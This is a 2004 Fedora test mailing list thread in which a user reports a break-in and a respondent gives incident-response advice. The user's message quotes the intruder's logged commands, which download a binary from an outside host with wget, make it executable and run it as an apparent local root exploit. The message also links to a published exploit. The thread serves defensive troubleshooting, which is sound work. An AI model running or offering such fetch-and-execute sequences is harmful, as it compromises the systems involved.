Vulnerability on FC3T2 ? Present in FC3 ?
Aaron Scott
scott.aaron at abc.net.au
Mon Nov 22 04:57:23 UTC 2004
I really should add as well that the exploit mentioned is a local
exploit. You need to be on the machine first as a local user before you
can execute it. Maybe check the non-root user histories as well. Maybe
some one has pinched your password.
On Mon, 2004-11-22 at 15:51 +1100, Aaron Scott wrote:
> And how does this prove that there is a vulnerability in fedora and
> not that you have poor securty?
>
> According to the URL's you post some one has installed a root kit.
> Unlucky. But they had to get it there first.
>
> You should first discover how they got onto your machine. You will
> need to check a lot more logs than just wtemp. Try secure and
> messages as well. Maybe some one guessed your password. I really
> hope that you have firewalled that ip range out to help prevent
> further trouble from that IP range ( assuming though the hacker isn't
> bouncing from comprimised machine to comprimised machine ). Also, you
> might want to consider who has had or might have had physical access
> to your machine ( if that is possible ).
>
> Pointing the finger at Fedora with out real proof is pointless.
>
>
> On Mon, 2004-11-22 at 02:14 +0000, richard mullens wrote:
>
> > Someone logged into my system on 13 Nov 2004
> > I found the following in /var/log/wtmp
> >
> > 207-36-180-20.prt.primarydns.com
> > demo.allegientsystems.com
> >
> > My user password was changed - but not the root password - and the
> > following commands had been executed:-
> >
> > w
> > uname -a
> > cat /etc/issue
> > cd /tmp
> > wget chebeleu.com/local
> > chmod +x local
> > ./local -d -r
> > ./local -d -r
> > lunx
> > lynx
> >
> > There is a similar report dated 10-Nov-2004 at
> > http://episteme.arstechnica.com/eve/ubb.x?a=tpc&s=50009562&f=96509133&m=531005547631
> > where someone suggested it might be the exploit at
> > http://www.k-otik.com/exploits/12.05.hatorihanzo.c.php
> >
> > Anybody know any more ?
> >
>
> --
> fedora-test-list mailing list
> fedora-test-list at redhat.com
> To unsubscribe:
> http://www.redhat.com/mailman/listinfo/fedora-test-list
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.fedoraproject.org/pipermail/test/attachments/20041122/8a8569c7/attachment.html
More information about the test
mailing list